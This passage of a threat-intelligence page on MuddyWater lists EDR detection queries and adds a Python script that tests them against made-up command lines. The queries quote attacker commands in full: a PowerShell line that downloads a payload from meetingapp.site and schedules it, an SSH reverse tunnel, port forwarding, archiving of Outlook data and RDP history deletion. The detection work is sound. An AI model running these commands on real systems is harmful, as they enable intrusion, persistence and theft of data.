    technologygroup = "EDR" and commandline like "%TNC <%> -Port 389%"

    Detection Query 106:

    technologygroup = "EDR" and (commandline like "netstat -nao" or commandline like "findstr 443")

    Detection Query 107:

    technologygroup = "EDR" and commandline like "netsh i p re all"

    Detection Query 108:

    technologygroup = "EDR" and commandline like ".\443.exe"

    Detection Query 109:

    technologygroup = "EDR" and commandline like "%WINDIR%\System32\drivers\conhost.exe -f conhost.dll -ER --ln --path cmd.exe%"

    Detection Query 110:

    technologygroup = "EDR" and (commandline like "cmd.exe /C systeminfo" or commandline like "findstr /I")

    Detection Query 111:

    technologygroup = "EDR" and commandline like "%PROGRAMFILES%\WinRAR\RAR.exe%" and commandline like "a -v1000m -m5" and commandline like "%PROGRAMFILES%\WinRAR\%.rar%" and commandline like "%C:/Users/%/AppData/Local/Microsoft/Outlook/%"

    Detection Query 112:

    technologygroup = "EDR" and commandline like "net user DC-01$ P@ssw0rd"

    Detection Query 113:

    technologygroup = "EDR" and commandline like "%WINDIR%\system32\openssh\ssh.exe[%]@[%] -p 443 -o ServerAliveInterval=60 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -f -N -R 1070%"

    Detection Query 114:

    technologygroup = "EDR" and commandline like "reg delete" and commandline like "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" and commandline like "/va /f"

    Detection Query 115:

    technologygroup = "EDR" and commandline like "reg delete" and commandline like "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" and commandline like "/f"

    Detection Query 116:

    technologygroup = "EDR" and commandline like "SCCM.exe reconfig /target:[REDACTED]"

    Detection Query 117:

    technologygroup = "EDR" and commandline like "Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name Renovation -Value" and commandline like "cmd /c \"

    Detection Query 118:

    technologygroup = "EDR" and commandline like "$path=$di+\WinWebex.exe;Add-Type -A System.Net.Http;$c=New-Object System.Net.Http.HttpClient; $c.DefaultRequestHeaders.UserAgent.ParseAdd(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0);[IO.File]::WriteAllBytes($path, $c.GetAsync(https://meetingapp.site/webexdownload).Result.Content.ReadAsByteArrayAsync().Result); $c.Dispose();Register-ScheduledTask -TaskName winWebex -Action (New-ScheduledTaskAction -Execute $path) -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Hours 2) -RepetitionDuration ([TimeSpan]::FromDays(9999))) -Settings (New-ScheduledTaskSettingsSet -ExecutionTimeLimit (New-TimeSpan -Seconds 0)) -Force; Start-ScheduledTask -TaskName winWebex;exit;"

    Detection Query 119:

    resourcename = "Unix" and commandline like "uname -v > /tmp/%" and commandline like ".txt 2>&1"

    Detection Query 120:

    resourcename = "Unix" and commandline like "hostname > /tmp/%" and commandline like ".txt 2>&1"

    Detection Query 121:

    resourcename = "Unix" and commandline like "whoami > /tmp/%" and commandline like ".txt 2>&1"

    Detection Query 122:

    resourcename = "Unix" and commandline like "+%Z > /tmp/%" and commandline like ".txt 2>&1"

    Detection Query 123:

    resourcename = "Unix" and commandline like "uname -r > /tmp/%" and commandline like ".txt 2>&1"

    Detection Query 124:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "ssh 104.238.191.185 -P 443"

    Detection Query 125:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "netsh i p a v listenport=443 connecthost=127.0.0.1 connectport=28443"

    Detection Query 126:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "netsh i p a v listenport=443 connectaddress=127.0.0.1 connectport=28443"

    Detection Query 127:

    technologygroup = "EDR" and commandline like "uname -v > /tmp/%" and commandline like ".txt 2>&1"

    Detection Query 128:

    technologygroup = "EDR" and commandline like "hostname > /tmp/%" and commandline like ".txt 2>&1"

    Detection Query 129:

    technologygroup = "EDR" and commandline like "whoami > /tmp/%" and commandline like ".txt 2>&1"

    Detection Query 130:

    technologygroup = "EDR" and commandline like "+%Z > /tmp/%" and commandline like ".txt 2>&1"

    Detection Query 131:

    technologygroup = "EDR" and commandline like "uname -r > /tmp/%" and commandline like ".txt 2>&1"

    Detection Query 132:

    technologygroup = "EDR" and commandline like "ssh 104.238.191.185 -P 443"

    Detection Query 133:

    technologygroup = "EDR" and commandline like "netsh i p a v listenport=443 connecthost=127.0.0.1 connectport=28443"

    Detection Query 134:

    technologygroup = "EDR" and commandline like "netsh i p a v listenport=443 connectaddress=127.0.0.1 connectport=28443"
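The queries above are written as SQL-style `like` clauses, and what they actually match depends on how the query engine treats `%`: in these patterns it does double duty as the LIKE wildcard and as the delimiter of environment-variable names such as `%PUBLIC%` and `%PROGRAMFILES%`. The block below is an added example, not Trellix's or the page's own tooling. It ports Detection Queries 94, 99, 103, 113, 114 and 126 to Python regular expressions and runs them over constructed process command lines. It assumes that `like` is an unanchored, case-insensitive substring match, that known env-var tokens expand to their default Windows paths before matching (a choice made here, not something the page states), and it uses a documentation IP address in the sample events; the `[%]` in query 113 is written as a plain `%`. Two things the run shows that the query text alone does not: query 99 fires on every ordinary start of WINWORD.EXE, and the `or` in query 103 makes a bare `netstat -nao` sufficient on its own, so both need narrowing (parent process, user, or the follow-on file path) before they are alerts rather than hunting pivots.

```python
"""Run the page's SQL-style 'commandline like' detection queries over
constructed process-creation events.

Added example; this is not Trellix's or the page's own tooling. Assumptions
(labelled): 'like' is a case-insensitive, unanchored substring match in
which '%' is a wildcard; environment-variable tokens such as %PUBLIC% are
expanded to default Windows values before matching (a real engine might
instead treat both '%' as wildcards); the sample events are constructed,
not real telemetry.
"""
import re

# Assumed default values for the env-var tokens the page's queries use.
ENV_DEFAULTS = {
    "PUBLIC": r"C:\Users\Public",
    "PROGRAMFILES": r"C:\Program Files",
    "WINDIR": r"C:\Windows",
    "ALLUSERSPROFILE": r"C:\ProgramData",
}
ENV_TOKEN = re.compile(r"%([A-Z]+)%")


def like_to_regex(pattern: str):
    """Compile one 'commandline like "..."' pattern.

    Known %NAME% tokens become literal paths first, so '%PUBLIC%\\Downloads'
    does not turn into two wildcards. Every remaining '%' is a wildcard; the
    rest is matched literally (underscores included, since the page's
    patterns contain them as plain text).
    """
    expanded = ENV_TOKEN.sub(lambda m: ENV_DEFAULTS.get(m.group(1), m.group(0)), pattern)
    regex = ".*".join(re.escape(piece) for piece in expanded.split("%"))
    return re.compile(regex, re.IGNORECASE | re.DOTALL)


# Each rule is the AND of its terms; a term written as a list is an OR group,
# mirroring the page's 'and (... or ...)' form. Patterns are those of
# Detection Queries 94, 99, 103, 113, 114 and 126 (the '[%]' in query 113
# is written here as a plain '%').
RULES = {
    "DQ94 schtasks DailyUpdate -> novaservice.exe": [
        "%schtasks /create /sc daily /st % /tn %",
        "DailyUpdate",
        "/tr ",
        r"%PUBLIC%\Downloads\novaservice.exe%",
    ],
    "DQ99 WINWORD.EXE start": [r"%PROGRAMFILES%\Microsoft Office\Office16\WINWORD.EXE%"],
    "DQ103 netstat or findstr 28443": [["netstat -nao", "findstr 28443"]],
    "DQ113 ssh reverse tunnel -R 1070 over 443": [
        "%ssh.exe%@% -p 443 -o ServerAliveInterval=60 -o StrictHostKeyChecking=no"
        " -o UserKnownHostsFile=/dev/null -f -N -R 1070%",
    ],
    "DQ114 RDP history wipe": [
        "reg delete",
        r"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default",
        "/va /f",
    ],
    "DQ126 portproxy 443 -> 127.0.0.1:28443": [
        "netsh i p a v listenport=443 connectaddress=127.0.0.1 connectport=28443",
    ],
}

COMPILED = {
    name: [[like_to_regex(p) for p in (term if isinstance(term, list) else [term])]
           for term in terms]
    for name, terms in RULES.items()
}


def matches(rule_name: str, commandline: str) -> bool:
    """True when every AND term has at least one OR alternative that matches."""
    return all(any(rx.search(commandline) for rx in group) for group in COMPILED[rule_name])


def evaluate(commandline: str) -> list:
    """Names of all rules that fire on one command line, in RULES order."""
    return [name for name in RULES if matches(name, commandline)]


# Constructed sample events (not real telemetry; 203.0.113.10 is a documentation address).
SAMPLE_EVENTS = [
    r'schtasks /create /sc daily /st 09:00 /tn DailyUpdate /tr "C:\Users\Public\Downloads\novaservice.exe"',
    r'"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE" /n "C:\Users\alice\Documents\notes.docx"',
    "netstat -nao",
    r"C:\Windows\System32\OpenSSH\ssh.exe svc@203.0.113.10 -p 443 -o ServerAliveInterval=60"
    " -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -f -N -R 1070:127.0.0.1:3389",
    r'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f',
    "netsh i p a v listenport=443 connectaddress=127.0.0.1 connectport=28443",
    r"C:\Windows\System32\cmd.exe /c dir C:\Users\Public\Downloads",
]


def run_detections(events=SAMPLE_EVENTS) -> dict:
    """Map each command line to the list of rules it triggers."""
    return {event: evaluate(event) for event in events}


if __name__ == "__main__":
    for event, hits in run_detections().items():
        print(f"{hits or ['-']}\t{event[:70]}")
```

Running it prints one line per sample event with the rules that fired. The benign Word launch and the bare `netstat -nao` both produce a hit, which is the point: when porting these queries to a production rule set, add a parent-process or file-path condition to 99 and drop the `or` in 103 so that `findstr 28443` (the forwarded port from queries 125 and 126) is required.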

    Reference:

    https://www.trellix.com/blogs/research/the-iranian-cyber-capability-2026/

    Tags

    Malware, Threat Actor, Iran, MuddyWater, APT, United States, Israel
